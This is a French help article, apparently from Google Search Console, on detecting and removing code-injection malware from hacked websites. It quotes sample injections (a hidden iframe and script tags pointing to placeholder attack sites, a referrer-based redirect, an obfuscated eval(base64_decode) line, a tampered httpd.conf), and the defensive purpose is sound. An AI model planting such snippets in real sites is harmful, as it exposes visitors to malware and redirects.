Type de logiciel malveillant : injection de code

Quelle est la signification des pages signalées par le type d'infection par le logiciel malveillant "Injection de code" dans Search Console ?

Cela signifie que les pages de votre site ont été modifiées afin d'ajouter du code malveillant, comme un iFrame à un site pirate de logiciel malveillant.

Pour en savoir plus sur les logiciels malveillants, consultez la section Évaluer les dommages (piraté par un logiciel malveillant).

Comment puis-je rechercher le type de logiciel malveillant "injection de code" ?

Tout d'abord, vous ne devez pas utiliser de navigateur pour consulter les pages infectées de votre site. Étant donné que les logiciels malveillants se propagent en exploitant les failles des navigateurs, ouvrir une page infectée par un logiciel malveillant dans un navigateur peut endommager votre ordinateur.

Pensez à vérifier le comportement à l'aide des commandes cURL ou Wget afin d'effectuer des requêtes HTTP (pour explorer une page par exemple). Ces outils disponibles gratuitement sont utiles pour diagnostiquer des URL de redirection et ont la possibilité d'inclure des informations concernant des URL de provenance ou des user-agents. En diffusant du contenu malveillant uniquement aux internautes possédant des user-agents ou des URL de provenance particuliers, le pirate informatique peut cibler plus de "personnes réelles" et peut davantage échapper à la détection par les propriétaires de site et les détecteurs de logiciels malveillants. Votre site doit être en ligne pour utiliser ces outils.

Par exemple :

$curl -v --referer <referer-field> --user-agent "Mozilla/5.0 (
  Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, comme Gecko) 
  Chrome/12.0.742.112 Safari/534.30" <votre-url>
tel que
$curl -v --referer "http://www.google.com" --user-agent "Mozilla/5.0 
  (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, comme Gecko) 
  Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html

Connectez-vous ensuite à votre système de fichiers. Recherchez toutes les ressources qui écrivent sur les URL infectées "injection de code". Ci-après quelques exemples d'injections de code malveillant :

  • iFrame vers un site pirate
  • <iframe frameborder="0" height="0" src="http://<attack-site>/path/file" 
      style="display:none" width="0"></iframe>
  • langage JavaScript ou autre langage de script qui appelle et exécute des scripts provenant d'un site pirate
  • <script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
  • script qui redirige le serveur vers un site pirate
  • <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://malware-attack-site/");
      }
    </script>
  • code malveillant dissimulé pour ne pas être détecté
  • eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • fichiers d'objets partagés conçus pour écrire de façon aléatoire un code malveillant sur des scripts non infectés
  • #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

Recherchez tous les codes malveillants qui peuvent se trouver sur le site. Il s'avère nécessaire de rechercher des mots comme [iFrame] pour trouver le code iFrame. Recherchez aussi "script", "eval" et "unescape". Par exemple, pour les systèmes d'exploitation Unix :

$grep -irn "iframe" ./ | less

Comment puis-je supprimer le type de logiciel malveillant "Injection de code" de mon site ?

Lorsque vous êtes prêt à nettoyer votre site (étape 7 de l'aide au processus de récupération des sites piratés), vous pouvez soit remplacer les fichiers affectés par la dernière sauvegarde non infectée, soit supprimer les injections de code de chaque page ainsi que toutes les fonctions et tous les fichiers de script correspondant. Si vous avez modifié des fichiers de configuration du serveur, vous devrez peut-être redémarrer votre serveur Web pour que les modifications prennent effet.

Sachez que supprimer le code malveillant ne permet pas de corriger la faille de sécurité qui a initialement permis au pirate informatique de pirater votre site. Si vous n'en corrigez pas la cause principale, votre site peut à nouveau faire l'objet d'un piratage. Pour en savoir plus sur le nettoyage de l'ensemble de votre site, et non uniquement sur ce type de logiciel malveillant, consultez la section "Évaluation des dommages dans le système de fichiers" de l'étape 5 : Évaluer les dommages (piraté par un logiciel malveillant) de l'aide aux sites piratés.

Cet article vous a-t-il été utile ?
Comment pouvons-nous l'améliorer ?